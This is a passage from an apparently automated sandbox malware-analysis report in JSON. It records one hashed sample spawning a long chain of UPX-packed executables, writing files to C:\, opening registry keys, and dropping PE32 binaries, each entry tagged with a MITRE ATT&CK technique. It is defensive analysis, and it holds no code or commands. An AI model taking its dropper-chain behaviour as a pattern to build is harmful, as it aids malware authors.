"target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"242680.exe\" (UID: 00000000-00005352)\n Spawned process \"06484.exe\" (UID: 00000000-00003928)\n Spawned process \"26802.exe\" (UID: 00000000-00004268)\n Spawned process \"06224.exe\" (UID: 00000000-00005168)\n Spawned process \"xrnbdjd.exe\" (UID: 00000000-00005188)\n Spawned process \"njljtn.exe\" (UID: 00000000-00002220)\n Spawned process \"xvdbp.exe\" (UID: 00000000-00002116)\n Spawned process \"plfthj.exe\" (UID: 00000000-00005664)\n Spawned process \"jrfxlf.exe\" (UID: 00000000-00004648)\n Spawned process \"8844064.exe\" (UID: 00000000-00006120)\n Spawned process \"pxjrr.exe\" (UID: 00000000-00006092)\n Spawned process \"bnjjv.exe\" (UID: 00000000-00003796)\n Spawned process \"626400.exe\" (UID: 00000000-00005072)\n Spawned process \"882066.exe\" (UID: 00000000-00003232)\n Spawned process \"880202.exe\" (UID: 00000000-00003228)\n Spawned process \"nvrtbh.exe\" (UID: 00000000-00003680)\n Spawned process \"hnbnnnb.exe\" (UID: 00000000-00000132)\n Spawned process \"dppbn.exe\" (UID: 00000000-00003260)\n Spawned process \"dxrftlp.exe\" (UID: 00000000-00002444)\n Spawned process \"xvnnn.exe\" (UID: 00000000-00003456)\n Spawned process \"ftvfbtx.exe\" (UID: 00000000-00001852)\n Spawned process \"rxvhlp.exe\" (UID: 00000000-00003500)\n Spawned process \"fbtltj.exe\" (UID: 00000000-00000692)\n Spawned process \"0064284.exe\" (UID: 00000000-00001856)\n Spawned process \"484088.exe\" (UID: 00000000-00005740)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0\" was detected as \"UPX\" and name: \"Packer\"\n \"fvxfr.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"fpnhxpp.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"dlnbh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"jfjjpnn.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"bttxlfh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"hlphd.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"8664860.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"868480.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"44822.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"06066.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"lxvrdvn.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"dlvbt.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"pfftl.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"hfrvlvv.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"tfjtht.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"02488.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"24026.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"020286.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"fnttpf.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"lpftbf.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"bhbtd.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"vtbthnv.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"hbrjl.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"bnvxpv.exe\" was detected as \"UPX\" and name: \"Packer\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"fvxfr.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"fpnhxpp.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"dlnbh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"jfjjpnn.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"bttxlfh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"hlphd.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"8664860.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"868480.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"44822.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"06066.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"lxvrdvn.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"dlvbt.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"pfftl.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"hfrvlvv.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"tfjtht.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"02488.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"24026.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"020286.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"fnttpf.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"lpftbf.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"bhbtd.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"vtbthnv.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"hbrjl.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"bnvxpv.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"242680.exe\" trying to access non-existent file \"c:\\FLTLIB.DLL\"\n \"242680.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"242680.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"242680.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"242680.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"242680.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" reads file \"c:\\edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" reads file \"c:\\242680.exe\"\n \"242680.exe\" reads file \"c:\\242680.exe\"\n \"242680.exe\" reads file \"c:\\06484.exe\"\n \"06484.exe\" reads file \"c:\\06484.exe\"\n \"06484.exe\" reads file \"c:\\26802.exe\"\n \"26802.exe\" reads file \"c:\\26802.exe\"\n \"26802.exe\" reads file \"c:\\06224.exe\"\n \"06224.exe\" reads file \"c:\\06224.exe\"\n \"06224.exe\" reads file \"c:\\xrnbdjd.exe\"\n \"xrnbdjd.exe\" reads file \"c:\\xrnbdjd.exe\"\n \"xrnbdjd.exe\" reads file \"c:\\njljtn.exe\"\n \"njljtn.exe\" reads file \"c:\\njljtn.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" trying to touch file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" trying to touch file \"c:\\242680.exe\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" trying to touch file \"c:\\ui\\SwDRM.dll\"\n \"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" trying to touch file \"C:\\Windows\\System32\\imm32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"242680.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"06484.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"26802.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"06224.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"xrnbdjd.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"njljtn.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"xvdbp.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"plfthj.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"jrfxlf.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"8844064.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"pxjrr.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"bnjjv.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"242680.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"06484.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"26802.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"06224.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"xrnbdjd.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"njljtn.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"xvdbp.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"plfthj.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"jrfxlf.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"8844064.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"pxjrr.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"bnjjv.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"626400.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"882066.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"880202.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"nvrtbh.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"hnbnnnb.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"dppbn.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"dxrftlp.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"xvnnn.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ftvfbtx.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rxvhlp.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"fbtltj.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"0064284.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0.exe\" writes file \"c:\\242680.exe\"\n \"242680.exe\" writes file \"c:\\06484.exe\"\n \"06484.exe\" writes file \"c:\\26802.exe\"\n \"26802.exe\" writes file \"c:\\06224.exe\"\n \"06224.exe\" writes file \"c:\\xrnbdjd.exe\"\n \"xrnbdjd.exe\" writes file \"c:\\njljtn.exe\"\n \"njljtn.exe\" writes file \"c:\\xvdbp.exe\"\n \"xvdbp.exe\" writes file \"c:\\plfthj.exe\"\n \"plfthj.exe\" writes file \"c:\\jrfxlf.exe\"\n \"jrfxlf.exe\" writes file \"c:\\8844064.exe\"\n \"8844064.exe\" writes file \"c:\\pxjrr.exe\"\n \"pxjrr.exe\" writes file \"c:\\bnjjv.exe\"\n \"bnjjv.exe\" writes file \"c:\\626400.exe\"\n \"626400.exe\" writes file \"c:\\882066.exe\"\n \"882066.exe\" writes file \"c:\\880202.exe\"\n \"880202.exe\" writes file \"c:\\nvrtbh.exe\"\n \"nvrtbh.exe\" writes file \"c:\\hnbnnnb.exe\"\n \"hnbnnnb.exe\" writes file \"c:\\dppbn.exe\"\n \"dppbn.exe\" writes file \"c:\\dxrftlp.exe\"\n \"dxrftlp.exe\" writes file \"c:\\xvnnn.exe\"\n \"xvnnn.exe\" writes file \"c:\\ftvfbtx.exe\"\n \"ftvfbtx.exe\" writes file \"c:\\rxvhlp.exe\"\n \"rxvhlp.exe\" writes file \"c:\\fbtltj.exe\"\n \"fbtltj.exe\" writes file \"c:\\0064284.exe\"\n \"0064284.exe\" writes file \"c:\\484088.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"fvxfr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"fpnhxpp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"dlnbh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"jfjjpnn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"bttxlfh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hlphd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"8664860.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"868480.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"44822.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"06066.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"lxvrdvn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"dlvbt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"pfftl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hfrvlvv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hfrvlvv.exe]- [targetUID: 00000000-00001292]\n \"tfjtht.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tfjtht.exe]- [targetUID: 00000000-00001292]\n \"02488.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\02488.exe]- [targetUID: 00000000-00002876]\n \"24026.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\24026.exe]- [targetUID: 00000000-00004040]\n \"020286.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\020286.exe]- [targetUID: 00000000-00004040]\n \"fnttpf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fnttpf.exe]- [targetUID: 00000000-00003776]\n \"lpftbf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lpftbf.exe]- [targetUID: 00000000-00002812]\n \"bhbtd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bhbtd.exe]- [targetUID: 00000000-00003972]\n \"vtbthnv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vtbthnv.exe]- [targetUID: 00000000-00003972]\n \"hbrjl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hbrjl.exe]- [targetUID: 00000000-00003064]\n \"bnvxpv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bnvxpv.exe]- [targetUID: 00000000-00003844]\n \"rnhbh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rnhbh.exe]- [targetUID: 00000000-00003844]\n \"ntnbrnr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ntnbrnr.exe]- [targetUID: 00000000-00002172]\n \"6466820.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6466820.exe]- [targetUID: 00000000-00000704]\n \"4088420.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4088420.exe]- [targetUID: 00000000-00002764]\n \"408628.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\408628.exe]- [targetUID: 00000000-00002764]\n \"284486.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\284486.exe]- [targetUID: 00000000-00003416]\n \"8280068.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8280068.exe]- [targetUID: 00000000-00003416]\n \"0824600.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0824600.exe]- [targetUID: 00000000-00003028]\n \"fdjlrbp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fdjlrbp.exe]- [targetUID: 00000000-00004568]\n 